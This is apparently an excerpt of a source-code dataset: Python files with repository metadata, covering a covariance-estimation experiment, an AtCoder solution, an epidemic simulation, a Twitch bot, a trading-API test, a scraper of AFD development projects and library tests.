Args:
scalar_sampler: a function that receives an integer m, and draws m positive
scalars from some distribution. the distribution defines the type of
elliptic distribution we are using.
See Frahm 04. https://kups.ub.uni-koeln.de/1319/
n: number of variables in the elliptic distribution.
m_train: number of training examples to draw from distribution.
seed: seed for the random number generator, for reproducibility purposes.
sparsity_alpha: sparsity parameter. see details of make_sparse_spd_matrix.
Returns:
Training data, and the inverse covariance matrix it was generates with.
Raises:
Exception: if there was a problem with generating a covariance matrix, such
that the resulting matrix was not positive definite.
"""
np.random.seed(seed)
num_samples = m_train
inverse_cov = get_sparse_high_correlations(n, seed,
sparsity_alpha=sparsity_alpha)
inverse_cov = np.float32(inverse_cov)
covariance = np.linalg.inv(inverse_cov)
if not check_pd(covariance):
raise Exception('covariance matrix is not Positive Definite')
spherical_uniform = np.random.randn(n, num_samples)
spherical_uniform /= np.linalg.norm(spherical_uniform, axis=0)
scaling_params = scalar_sampler(num_samples)
train_data = np.multiply(scaling_params.T,
sp.linalg.sqrtm(covariance).dot(spherical_uniform))
return train_data, inverse_cov
def get_losses_dictionary(features_dimension):
"""Creates a dictionary with all the losses to test, and their gradients.
Args:
features_dimension: the dimension of the inverse covariance matrix we are
estimating.
Returns:
A dictionary where the keys are the names of the losses to estimate and the
values are tuples of (loss, grad) where loss is the loss function and grad
is its gradient.
"""
loss_factory = LossFunctionFactory()
loss_dict = {
'tyler': loss_factory.tylers_estimator({'d': features_dimension}),
'gen_gauss_0_2': loss_factory.generalized_gaussian({
'm': (features_dimension)**((0.2-1)/0.2),
'beta': 0.2
}),
'gen_gauss_0_5': loss_factory.generalized_gaussian({
'm': (features_dimension)**((0.5-1)/0.5),
'beta': 0.5
}),
'multivariate_t': loss_factory.multivariate_t({
'nu': 3.,
'd': features_dimension
})
}
return loss_dict
def get_distance_from_ground_truth(ground_truth_matrix, estimation, std=None):
"""Calculates an normalized distance of estimation and ground truth matrix.
Args:
ground_truth_matrix: the true inverse covariance matrix we are estimating.
estimation: the estimation of the matrix.
std: if not None, it is the standard deviation of each feature in the
training data. This is used to restore the original sclaes of the features
before measuring the distance between matrices.
Returns:
the normalized frobenius distance (i.e. froebnius distance divided by
frobenius norm of ground_truth_matrix) between normalized versions of
estimation and ground_truth_matrix. normaliztion is done by dividing
estimation by its trace and multiplying by that of ground_truth_matrix.
"""
if std is not None:
diag_of_stds = np.linalg.inv(np.diag(std))
estimation = diag_of_stds.dot(estimation).dot(diag_of_stds)
estimation *= (np.trace(ground_truth_matrix)/np.trace(estimation))
distance_between_normalized = np.linalg.norm(estimation - ground_truth_matrix)
return distance_between_normalized/np.linalg.norm(ground_truth_matrix)
def run_experiment(data_train, edge_indices_with_diag, inverse_covariance,
seed, sampler_type, sampler_param, sparsity_alpha,
num_steps_newton, num_steps_mm_newton, num_steps_mm,
standardize_data=True):
"""Runs a single experiment comparing all losses on generated data.
Args:
data_train: the generated data to run on.
edge_indices_with_diag: list of edges to use for the graphical structure.
An edge is itself a list of two integers in the range [0..num_features-1].
Should include self edges (i.e. [i,i]) for digonal elements of the inverse
covariance.
inverse_covariance: the ground truth inverse covariance matrix used to
generate the data.
seed: the seed used in generation of the data, for logging purposes.
sampler_type: the type of sampler used to generate the data (see
PositiveScalarSamplerFactory)
sampler_param: parameter for the scalar sampler (shape for mggd and degrees
of freedom for t-distribution)
sparsity_alpha: sparsity parameter. see details of make_sparse_spd_matrix.
num_steps_newton: maximum number of steps for newton optimizer in structured
gmrfs.
num_steps_mm_newton: maximum number of steps for inner loop newton optimizer
in minimization majorization of structured robust mrfs.
num_steps_mm: maximum number of minimization majorization steps in robust
mrfs.
standardize_data: if True, divides training data by standard deviations
before passing to structured optimizers.
"""
[num_features, m_train] = data_train.shape
tf.logging.info('==== seed={}, m_train={},'.format(seed, m_train))
# Create directory to save results.
full_dir = os.path.join(FLAGS.save_dir, '%d_%d' %
(num_features, m_train))
full_dir = os.path.join(full_dir, '%d' % (seed))
if sampler_type == 'mggd':
full_dir = os.path.join(full_dir,
'%s_beta_%0.2f' % (sampler_type, sampler_param))
elif sampler_type == 'multivariate_t':
full_dir = os.path.join(full_dir,
'%s_nu_%0.2f' % (sampler_type, sampler_param))
full_dir = os.path.join(full_dir, '%0.2f' % (sparsity_alpha))
if tf.gfile.Exists(full_dir):
if FLAGS.delete_existing:
tf.gfile.DeleteRecursively(full_dir)
tf.gfile.MakeDirs(full_dir)
# Standardize data and keep stds
std_val = None
if standardize_data:
std_val = np.std(data_train, axis=1)
data_train_ = data_train/np.std(data_train, axis=1, keepdims=True)
else:
data_train_ = data_train
# Sample Covariance
sample_cov = data_train.dot(data_train.T)/m_train
inverse_sample_cov = np.linalg.pinv(sample_cov)
sample_cov_err = get_distance_from_ground_truth(inverse_covariance,
inverse_sample_cov,
std=None)
# Save results for sample covariance estimator.
fname = os.path.join(full_dir, '%s.npy' % 'sample_cov_err')
print('fname', fname)
with tf.gfile.Open(fname, 'w') as fp:
print(sample_cov_err)
np.save(fp, sample_cov_err)
# Gaussian MRF
gmrf_optimizer = GMRFOptimizer(num_features, edge_indices_with_diag)
estimate_gmrf, _ = (
gmrf_optimizer.alt_newton_coord_descent(data_train_,
max_iter=num_steps_newton))
gmrf_err = get_distance_from_ground_truth(inverse_covariance, estimate_gmrf,
std=std_val)
fname = os.path.join(full_dir, '%s.npy' % 'gmrf_err')
print('fname', fname)
with tf.gfile.Open(fname, 'w') as fp:
print(gmrf_err)
np.save(fp, gmrf_err)
n_steps_newt = num_steps_mm_newton
loss_dict = get_losses_dictionary(num_features)
for estimator_name, (loss, loss_grad) in loss_dict.items():
estimate_cur, _ = (
structured_elliptical_maximum_likelihood(data_train_, loss, loss_grad,
edge_indices_with_diag,
initial_value=None,
max_iters=num_steps_mm,
newton_num_steps=n_steps_newt))
cur_err = get_distance_from_ground_truth(inverse_covariance, estimate_cur,
std=std_val)
fname = os.path.join(full_dir, '%s.npy' % (estimator_name+'_err'))
print('fname', fname)
with tf.gfile.Open(fname, 'w') as fp:
print(cur_err)
np.save(fp, cur_err)
def main(argv):
del argv # Unused.
tf.logging.set_verbosity(tf.logging.INFO)
seed = FLAGS.seed
num_features = FLAGS.num_features
num_steps_newton = FLAGS.num_steps_newton
num_steps_mm_newton = FLAGS.num_steps_mm_newton
num_steps_mm = FLAGS.num_steps_mm
sparsity_alpha = FLAGS.sparsity_alpha
sampler_type = FLAGS.sampler_type
standardize_data = FLAGS.standardize_data
beta = FLAGS.beta
nu = FLAGS.nu
# Get the scalar sampler for generating elliptic data
scalar_sampler_factory = PositiveScalarSamplerFactory()
if sampler_type == 'mggd':
assert(beta <= 1 and beta > 0)
sampler_param = beta
gen_gauss_sampler_params = {'shape': beta, 'dim': num_features}
scalar_sampler = \
scalar_sampler_factory.generalized_gaussian(gen_gauss_sampler_params)
elif sampler_type == 'multivariate_t':
assert nu > 2
sampler_param = nu
multi_t_sampler_params = {'nu': nu, 'dim': num_features}
scalar_sampler = \
scalar_sampler_factory.multivariate_t(multi_t_sampler_params)
else:
raise ValueError('Unrecognized sampler type')
# Create training data and ground truth parameters.
m_train_max = 1500
np.random.seed(seed)
data_train, inverse_cov = get_elliptic_data(scalar_sampler, num_features,
m_train_max, seed=seed,
sparsity_alpha=sparsity_alpha)
edge_indices = get_edge_indices_from_matrix(inverse_cov)
edge_indices = np.concatenate([edge_indices,
[[i, i] for i in range(num_features)]])
m_trains = [30, 40, 50, 60, 70, 80, 100, 150, 250, 500, 850]
for m in m_trains:
np.random.seed(seed)
train_inds = np.random.permutation(m_train_max)[:m]
data_train_cur = data_train[:, train_inds]
print('==== n={}, seed={}, m_train={}, sparsity_alpha={}'
', distribution_beta={}'.format(num_features, seed, m, sparsity_alpha,
beta))
run_experiment(data_train_cur, edge_indices, inverse_cov, seed,
sampler_type, sampler_param, sparsity_alpha,
num_steps_newton, num_steps_mm_newton, num_steps_mm,
standardize_data=standardize_data)
if __name__ == '__main__':
tf.app.run(main)
| [
"[email protected]"
] | |
8284303e2d78a6089a9fd4c7ccbb37454b2e67c4 | 503d2f8f5f5f547acb82f7299d86886691966ca5 | /atcoder/abc200_c.py | e206350c17a0371913a9b0f7696b9550c9039895 | [] | no_license | Hironobu-Kawaguchi/atcoder | 3fcb649cb920dd837a1ced6713bbb939ecc090a9 | df4b55cc7d557bf61607ffde8bda8655cf129017 | refs/heads/master | 2023-08-21T14:13:13.856604 | 2023-08-12T14:53:03 | 2023-08-12T14:53:03 | 197,216,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | # https://atcoder.jp/contests/abc200/tasks/abc200_c
from collections import Counter
n = int(input())
a = list(map(int, (input().split())))
for i in range(n):
a[i] %= 200
cnt = Counter(a)
ans = 0
for i, v in cnt.items():
if v>=2:
ans += v*(v-1) // 2
print(ans)
| [
"[email protected]"
] | |
e58cfb3de60cd764e85865be181cffa7c8b60191 | 81f2653de884d9b27c4f921ee8b2761ef65098db | /main.py | 8ded70c9b58c8deb91be512a7ffa6b4c6dbc216c | [] | no_license | vnikaski/epidemic_simulation | fa2b084b2281ef34dd200b1bde971a9365afc1f7 | 8aba4ac026bfc4b35405964435512703f7adcba7 | refs/heads/master | 2021-05-19T13:40:37.081479 | 2020-03-31T20:55:47 | 2020-03-31T20:55:47 | 251,729,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,666 | py | import numpy as np
from random import randint, random
from matplotlib import pylab
from matplotlib.animation import FuncAnimation
import argparse
def update_neighbours_for_cell(map: np.array, direction: str, i: int, j: int, r: int):
"""
Updates number of Moore's neighbours in the distance of r from the cell map[i,j]
:param map: map of states
:param direction: 'up', 'down', 'right', 'left'
:param i: row of the cell
:param j: column of the cell
:param r: radius of Moore's neighbourhood
:return: updated map: np.array
"""
a = 0 #sum of infected neighbours in given direction
for k in range(r):
b = k #parameter needed in the while loop to check for the edges of the map
c = k #same as above
if direction == 'up':
while j-b < 0:
b -= 1
while j+c+2 > len(map):
c -= 1
a = sum(map[i,j-b:j+c+2,0]==1)
elif direction == 'down':
while j-b-1 < 0:
b -= 1
while j+c+1 > len(map):
c -= 1
a = sum(map[i, j-b-1:j+c+1, 0]==1)
elif direction == 'left':
while i - b - 1 < 0:
b -= 1
while i + c + 1 > len(map):
c -= 1
a = sum(map[i-b-1:i+c+1, j, 0]==1)
elif direction == 'right':
while i-b < 0:
b -= 1
while i+c+2 > len(map):
c -= 1
a = sum(map[i-b:i+c+2, j, 0]==1)
map[i,j,1] += a
return map
def update_neighbours(map: np.array, r: int):
"""
Goes through all of the map to update neighbours in every direction
:param map: np.array map of states
:param r: radius of infection
:return: updated map np.array
"""
for i in range(len(map)):
for j in range(len(map)):
map = update_neighbours_for_cell(map, 'up', i, j, r)
map = update_neighbours_for_cell(map, 'right', i, j, r)
map = update_neighbours_for_cell(map, 'down', i, j, r)
map = update_neighbours_for_cell(map, 'left', i, j, r)
return map
def main(N: int, k: int, p_w: float, p_z: float, M: int, r: int = 1):
"""
Creates simulation of a spreading infection on a square map. Each cell is in one of the three states:
0 - healthy, capable of getting infected
1 - infected, can spread the infection
2 - cured, no longer spreading, can't get infected
:param N: size of the edge of the square
:param k: number of first randomly infected cells
:param p_w: probability of curing the infection by an infected cell per epoch
:param p_z: probability of getting the infection an infected neighbour cell (changes with the number of infected neighbours)
:param M: number of epochs
:param r: radius of spreadage
"""
map = np.zeros((N,N,2)) #creating map; every cell has two dimensions: [state, number_of_infected_neighbours]
while k > 0: #choosing randomly k infected people
i = randint(0, N-1)
j = randint(0, N-1)
if map[i,j,0] == 0:
map[i,j,0] = 1
k -= 1
map = update_neighbours(map, r) #updating infecting neighbours after random infection
count = {0: [sum(sum(map[:, :, 0] == 0))], 1: [sum(sum(map[:, :, 0] == 1))], 2: [sum(sum(map[:, :, 0] == 2))]}
#preparing for data storage needed for the animation
maps = np.zeros((N, N, M))
maps[:, :, 0] = map[:, :, 0]
for e in range(M): #iterating through epochs
for i in range(N): #going through rows of the map; i = row in
for j in range(N):#going through columns of the map; j = column in
if map[i,j,0] == 0 and map[i,j,1]>0 and random() < 1-(1-p_z)**map[i,j,1]: #trying to infect cell with probability = 1-(1-p_z)
map[i,j,0] = 1
elif map[i,j,0] == 1 and random() < p_w: #trying to heal infected cell
map[i,j,0] = 2
update_neighbours(map, r)
#counting epoch stats
count[0].append(sum(sum(map[:, :, 0] == 0)))
count[1].append(sum(sum(map[:, :, 0] == 1)))
count[2].append(sum(sum(map[:, :, 0] == 2)))
#drawing and saving heatmaps of map state in the epoch
pylab.imshow(map[:,:,0])
pylab.savefig(f"map{e+1}")
pylab.clf()
#saving data for animation
maps[:,:,e] = map[:,:,0]
if sum(sum(map[:,:,0])) == (N**2)*2: #checking whether everyone is cured to end simulation
break
pylab.plot(count[0], label='healthy')
pylab.plot(count[1], label='infected')
pylab.plot(count[2], label='cured')
pylab.legend(loc='upper right')
pylab.xlabel('epoch')
pylab.savefig(f"plot.png")
pylab.clf()
#preparing for animation
fig = pylab.figure()
im = pylab.imshow(maps[:, :, 0])
def init():
im.set_data(np.zeros((N, N)))
def animate(i):
data = maps[:, :, i]
im.set_data(data)
return im
#animation
anim = FuncAnimation(fig, animate, init_func=init, frames=M, repeat=False)
anim.save('spreading.gif', writer='imagemagick')
"""
Była próba wykorzystania biblioteki argparse jednak z poziomu terminala wykrywało dziwne błędy w kodzie, których normalnie nie było + nie widziało biblioteki numpy?
Możliwe, że wyhashowany kod działa, ale nie na moim komputerze, więc wykorzystałam niepreferowane rozwiązanie
"""
#parser = argparse.ArgumentParser()
#parser.add_argument("N", help="size of the map",type=int)
#parser.add_argument("k", help="number of infected cells",type=int)
#parser.add_argument("p_w", help="probability of curing the infection",type=float)
#parser.add_argument("p_z", help="probability of spreading the infection",type=float)
#parser.add_argument("M", help="number of epochs",type=int)
#parser.add_argument("r", help="radius of spreadage",type=int)
#args = parser.parse_args()
#main(args)
#Getting the data for simulation from the user
N = int(input("Set the size of the map (N): "))
k = int(input("Set the number of infected cells (k): "))
p_w = float(input("Set the probability of curing infection (p_w): "))
p_z = float(input("Set the probability of getting infected (p_z): "))
M = int(input("Set how many epochs should the simulation take (M): "))
r = input("Set the radius of spreading the infection (r), if not provided: r=1: ")
if r =='':
main(N,k,p_w,p_z,M)
else:
main(N,k,p_w,p_z,M,int(r))
| [
"[email protected]"
] | |
fe349e425c50cb0f517d63394f143894ac478af4 | 12e90368507792ef0ed9152d0b23852979455f95 | /src/run.py | a4a573d5a364ca56397c4bae87218ec87c162b40 | [] | no_license | KomorIksDe/KocchiBot--Twitch | a8dd8c670b4924e94729b26b86d5d61de47e901f | 075332eae8a569a12e1e729992550f5be8ed14ac | refs/heads/master | 2021-01-09T05:56:54.845886 | 2017-02-03T21:37:49 | 2017-02-03T21:37:49 | 80,871,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | import socket
import string
import time
from cfg import *
from bot import readMessage
sock = initSocket()
start = int(time.time())
while True:
for line in str(sock.recv(1024)).split('\\r\\n'):
parts = line.split(':')
if len(parts) < 3:
continue
if "QUIT" not in parts[1] and "JOIN" not in parts[1] and "PART" not in parts[1]:
message = parts[2][:len(parts[2])]
usernamesplit = parts[1].split("!")
username = usernamesplit[0]
readMessage(sock, message, username, start)
timePassed = time.time() | [
"[email protected]"
] | |
e3890f86efe95e867f60a04ad1fb1640b5b9c625 | 6a253ee7b47c5f70c826bbc97bb8e33cd1dab3b6 | /4.Working with Dask Bags for Unstructured Data/Filtering vetoed bills.py | f6f1b993c692dc6f8cda3afb05d26a40595ed1aa | [] | no_license | Mat4wrk/Parallel-Programming-with-Dask-in-Python-Datacamp | 19a646d6d16ff46173964c25639ff923407c8f32 | 535f69b78adb50cffc7f402f81ddff19f853eea1 | refs/heads/main | 2023-03-06T19:52:39.495066 | 2021-02-13T13:27:06 | 2021-02-13T13:27:06 | 338,565,569 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 279 | py | # Filter the bills: overridden
overridden = bills_dicts.filter(veto_override)
# Print the number of bills retained
print(overridden.count().compute())
# Get the value of the 'title' key
titles = overridden.pluck('title')
# Compute and print the titles
print(titles.compute())
| [
"[email protected]"
] | |
e39c0eb015805450cfadbbbadee7c3c216b162cf | 0e1fbfa23989dd5679d272b12c1e3d2080f2feb2 | /tests/data/config/t.py | 9f085ae675b33900f73434c3a7d631f7f24fb98d | [
"Apache-2.0"
] | permissive | LuGuo1920/mmcv | dae1003f63ce23d5cfc58b27c0c620a61cc5323e | 76d9bf1efb052785fea95cb157288a102976a49e | refs/heads/master | 2023-05-30T08:11:36.148373 | 2021-06-28T09:31:36 | 2021-06-28T09:31:36 | 381,047,895 | 1 | 0 | Apache-2.0 | 2021-06-28T13:49:28 | 2021-06-28T13:49:27 | null | UTF-8 | Python | false | false | 173 | py | _base_ = ['./l1.py', './l2.yaml', './l3.json', './l4.py']
item3 = False
item4 = 'test'
item8 = '{{fileBasename}}'
item9 = {{ _base_.item2 }}
item10 = {{ _base_.item7.b.c }}
| [
"[email protected]"
] | |
f178b663d0ee93882d7f0f23f79762c86c9a62b3 | d3efc82dfa61fb82e47c82d52c838b38b076084c | /Autocase_Result/ReverseRepo/YW_NHG_SHHG_019_GC028.py | 697b950c9b5b4c9f6d0da0feb24a47bcfb16928d | [] | no_license | nantongzyg/xtp_test | 58ce9f328f62a3ea5904e6ed907a169ef2df9258 | ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f | refs/heads/master | 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,026 | py | #!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_NHG_SHHG_019_GC028(xtp_test_case):
# YW_NHG_SHHG_019_GC028
def test_YW_NHG_SHHG_019_GC028(self):
title = '上海逆回购--数量(等于100万张)-28天'
# 定义当前测试用例的期待值
# 期望状态:初始、未成交、部成、全成、部撤已报、部撤、已报待撤、已撤、废单、撤废、内部撤单
# xtp_ID和cancel_xtpID默认为0,不需要变动
case_goal = {
'期望状态': '全成',
'errorID': 0,
'errorMSG': '',
'是否生成报单': '是',
'是否是撤废': '否',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
# 定义委托参数信息------------------------------------------
# 参数:证券代码、市场、证券类型、证券状态、交易状态、买卖方向(B买S卖)、期望状态、Api
stkparm = QueryStkPriceQty('204028', '1', '12', '2', '0', 'S', case_goal['期望状态'], Api)
# 如果下单参数获取失败,则用例失败
if stkparm['返回结果'] is False:
rs = {
'用例测试结果': stkparm['返回结果'],
'测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
}
self.assertEqual(rs['用例测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_REPO'],
'order_client_id':2,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SH_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_LIMIT'],
'price': stkparm['随机中间价'],
'quantity': 1000000,
'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
CaseParmInsertMysql(case_goal, wt_reqs)
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('执行结果为' + str(rs['用例测试结果']) + ','
+ str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
self.assertEqual(rs['用例测试结果'], True) # 0
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
fb4d4b99fef64675afb65af92c4e6b71f2d5ac46 | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/M/markbrough/afd_1.py | 711852c3ee8cd7a769192a8717034ae07c1ec594 | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,542 | py | import scraperwiki
from lxml import html
from urllib2 import urlopen, Request, URLError
import re
import string
URL = "http://www.afd.fr/base-projets/listerProjets.action?page=%s"
def cleanURL(data):
expression=re.compile("(\S*);jsessionid=(\S*)\?(\S*)")
d = expression.match(data)
return d.group(1)+"?"+d.group(3)
def cleandata(data):
if data:
newdata = string.strip(data)
else:
newdata=''
return newdata
def cleanamount(data):
eurosign = u"\u20AC"
commas = ','
spaces = '\r\n\t\t\t\t\t'
fixed = re.sub(eurosign, '', data)
fixed = re.sub(commas, '', fixed)
fixed = re.sub(spaces, '', fixed)
return fixed
def removeImage(data):
print "Trying to remove image from", data
fixed = re.sub('<img alt="" src="img/pdf.gif">', '', data)
fixed = re.sub("\r", '', data)
fixed = re.sub("\n", '', data)
fixed = re.sub("\t", '', data)
print "Final data after removing image is", data
return fixed
# utf8 : database_field_name
translations = {
u'Libell\xe9 du projet': 'name',
u'Num\xe9ro de projet': 'id',
u'Pays de r\xe9alisation': 'country',
u'B\xe9n\xe9ficiaire': 'beneficiary',
"Secteur d'intervention": 'aim',
'Agence de gestion': 'agency',
'Classement environnemental': 'environmental_impact',
'Classement social': 'social_impact',
u"Commentaire sur l'\xe9x\xe9cution du projet": 'comment',
'Execution': 'in progress',
'Etat du projet': 'status',
'Montant global du projet': 'funding_total_euros',
"Financement de l'AFD": 'funding_from_afd_euros',
'Forme de concours': 'funding_type',
'Cofinancement': 'is_co_financed',
u"Date d'identification valid\xe9e": 'date_validated',
"Date d'octroi du financement": 'date_funded',
'Chef de projet': 'project_manager',
'Responsable agence': 'responsible_agency',
'Structure responsable': 'responsible_structure',
'non': 'no',
'oui': 'yes',
}
def translate(french_str, warn_if_no_translation=False):
if not french_str:
return ''
if french_str in translations:
return translations[french_str].decode('utf8')
else:
if warn_if_no_translation:
print 'Could not translate: %s = %r' % (french_str, french_str)
return french_str
def scrape_project_page(data, project_url):
req = Request(project_url)
data['project_details'] = project_url
doc = html.parse(urlopen(req))
for tr in doc.findall('//table//tr'):
field = []
for cell_type in ('th', 'td'):
cells = tr.findall(cell_type)
if not cells:
# ignore row <th>Commentaire...</th> with no <td>
# TODO get the pdf links at this point
continue
warn_if_no_translation = cell_type == 'th'
if cells and cells[0].get('colspan') == '2':
# ignore section titles (they span both columns)
break
cells = [translate(cleanamount(cleandata(cell.text)),
warn_if_no_translation) \
for cell in cells]
field.append(' | '.join(cells))
if len(field) == 2:
if not field[0]:
# don't save a blank key
assert not field[1], 'Throwing away data without key: %r' % field[1]
continue
data[field[0]] = field[1]
#print 'SAVE %s : %s' % tuple(field)
document_field = doc.find('//tr//td//div/a')
if document_field is not None:
data["document_url"] = cleanURL("http://www.afd.fr"+document_field.get("href"))
data["document_name"] = document_field.text_content()
print "document name is", cleandata(document_field.text_content())
print "document url is", cleanURL("http://www.afd.fr"+document_field.get("href"))
scraperwiki.sqlite.save(unique_keys=["country", "description"],
data=data)
# loop over the pages of the "liste des projets"
page_number = 0
while True:
page_number += 1
req = Request(URL % (page_number))
try:
response = urlopen(req)
except URLError, e:
# import pdb; pdb.set_trace()
if response.status == 404:
break
doc = html.parse(response)
if not(doc.findall('//tbody//tr')):
break
# loop over each project summary
for tr in doc.findall('//tbody//tr'):
cells = list(tr.findall('td'))
if not len(cells):
continue
amount = re.sub(',', '', cells[2].text)
project_url = 'http://www.afd.fr' + cells[1].find('a').get('href')
data = {
'country' : cleandata(cells[0].text),
'description' : cleandata(cells[1].find('a').text),
'project_url' : cleanURL(project_url),
'funding_total_euros' : cleanamount(cleandata(amount)),
'status' : cleandata(cells[3].text),
'date_updated' : cells[4].text
}
# drill down into the project page
try:
scrape_project_page(data, project_url)
except:
# if that fails, save what we have!
scraperwiki.sqlite.save(unique_keys=["country", "description"],
data=data)
import scraperwiki
from lxml import html
from urllib2 import urlopen, Request, URLError
import re
import string
URL = "http://www.afd.fr/base-projets/listerProjets.action?page=%s"
def cleanURL(data):
expression=re.compile("(\S*);jsessionid=(\S*)\?(\S*)")
d = expression.match(data)
return d.group(1)+"?"+d.group(3)
def cleandata(data):
if data:
newdata = string.strip(data)
else:
newdata=''
return newdata
def cleanamount(data):
eurosign = u"\u20AC"
commas = ','
spaces = '\r\n\t\t\t\t\t'
fixed = re.sub(eurosign, '', data)
fixed = re.sub(commas, '', fixed)
fixed = re.sub(spaces, '', fixed)
return fixed
def removeImage(data):
print "Trying to remove image from", data
fixed = re.sub('<img alt="" src="img/pdf.gif">', '', data)
fixed = re.sub("\r", '', data)
fixed = re.sub("\n", '', data)
fixed = re.sub("\t", '', data)
print "Final data after removing image is", data
return fixed
# utf8 : database_field_name
translations = {
u'Libell\xe9 du projet': 'name',
u'Num\xe9ro de projet': 'id',
u'Pays de r\xe9alisation': 'country',
u'B\xe9n\xe9ficiaire': 'beneficiary',
"Secteur d'intervention": 'aim',
'Agence de gestion': 'agency',
'Classement environnemental': 'environmental_impact',
'Classement social': 'social_impact',
u"Commentaire sur l'\xe9x\xe9cution du projet": 'comment',
'Execution': 'in progress',
'Etat du projet': 'status',
'Montant global du projet': 'funding_total_euros',
"Financement de l'AFD": 'funding_from_afd_euros',
'Forme de concours': 'funding_type',
'Cofinancement': 'is_co_financed',
u"Date d'identification valid\xe9e": 'date_validated',
"Date d'octroi du financement": 'date_funded',
'Chef de projet': 'project_manager',
'Responsable agence': 'responsible_agency',
'Structure responsable': 'responsible_structure',
'non': 'no',
'oui': 'yes',
}
def translate(french_str, warn_if_no_translation=False):
if not french_str:
return ''
if french_str in translations:
return translations[french_str].decode('utf8')
else:
if warn_if_no_translation:
print 'Could not translate: %s = %r' % (french_str, french_str)
return french_str
def scrape_project_page(data, project_url):
req = Request(project_url)
data['project_details'] = project_url
doc = html.parse(urlopen(req))
for tr in doc.findall('//table//tr'):
field = []
for cell_type in ('th', 'td'):
cells = tr.findall(cell_type)
if not cells:
# ignore row <th>Commentaire...</th> with no <td>
# TODO get the pdf links at this point
continue
warn_if_no_translation = cell_type == 'th'
if cells and cells[0].get('colspan') == '2':
# ignore section titles (they span both columns)
break
cells = [translate(cleanamount(cleandata(cell.text)),
warn_if_no_translation) \
for cell in cells]
field.append(' | '.join(cells))
if len(field) == 2:
if not field[0]:
# don't save a blank key
assert not field[1], 'Throwing away data without key: %r' % field[1]
continue
data[field[0]] = field[1]
#print 'SAVE %s : %s' % tuple(field)
document_field = doc.find('//tr//td//div/a')
if document_field is not None:
data["document_url"] = cleanURL("http://www.afd.fr"+document_field.get("href"))
data["document_name"] = document_field.text_content()
print "document name is", cleandata(document_field.text_content())
print "document url is", cleanURL("http://www.afd.fr"+document_field.get("href"))
scraperwiki.sqlite.save(unique_keys=["id"],
data=data)
# loop over the pages of the "liste des projets"
page_number = 0
while True:
page_number += 1
req = Request(URL % (page_number))
try:
response = urlopen(req)
except URLError, e:
# import pdb; pdb.set_trace()
if response.status == 404:
break
doc = html.parse(response)
if not(doc.findall('//tbody//tr')):
break
# loop over each project summary
for tr in doc.findall('//tbody//tr'):
cells = list(tr.findall('td'))
if not len(cells):
continue
amount = re.sub(',', '', cells[2].text)
project_url = 'http://www.afd.fr' + cells[1].find('a').get('href')
data = {
'country' : cleandata(cells[0].text),
'description' : cleandata(cells[1].find('a').text),
'project_url' : cleanURL(project_url),
'funding_total_euros' : cleanamount(cleandata(amount)),
'status' : cleandata(cells[3].text),
'date_updated' : cells[4].text
}
# drill down into the project page
try:
scrape_project_page(data, project_url)
except:
# if that fails, save what we have!
scraperwiki.sqlite.save(unique_keys=["id"],
data=data)
| [
"[email protected]"
] | |
16011c0ebe4ae0b5330d83fc1d4a9a63f5e4b0a1 | 437a0f81f161438bba3554f440364b965fc3f432 | /tests/unit/types/test_document.py | 57d2ae8e6082e82b1cab460573f4c8fb735dc581 | [
"Apache-2.0"
] | permissive | ApurvaMisra/jina | dbbe2873771eafbbdf429c9dd717e26733496d49 | 1ecf2d74179f29f196a964f6d779b1a32bf78e7c | refs/heads/master | 2023-01-24T12:46:27.030417 | 2020-12-03T17:53:41 | 2020-12-03T17:53:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,070 | py | import numpy as np
import pytest
from google.protobuf.json_format import MessageToDict
from jina import NdArray, Request
from jina.proto.jina_pb2 import DocumentProto
from jina.types.document import Document, BadDocID
from tests import random_docs
@pytest.mark.parametrize('field', ['blob', 'embedding'])
def test_ndarray_get_set(field):
a = Document()
b = np.random.random([10, 10])
setattr(a, field, b)
np.testing.assert_equal(getattr(a, field), b)
b = np.random.random([10, 10])
c = NdArray()
c.value = b
setattr(a, field, c)
np.testing.assert_equal(getattr(a, field), b)
b = np.random.random([10, 10])
c = NdArray()
c.value = b
setattr(a, field, c.proto)
np.testing.assert_equal(getattr(a, field), b)
def test_doc_update_fields():
a = Document()
b = np.random.random([10, 10])
c = {'tags': 'string', 'tag-tag': {'tags': 123.45}}
d = [12, 34, 56]
e = 'text-mod'
w = 2.0
a.set_attrs(embedding=b, tags=c, location=d, modality=e, weight=w)
np.testing.assert_equal(a.embedding, b)
assert list(a.location) == d
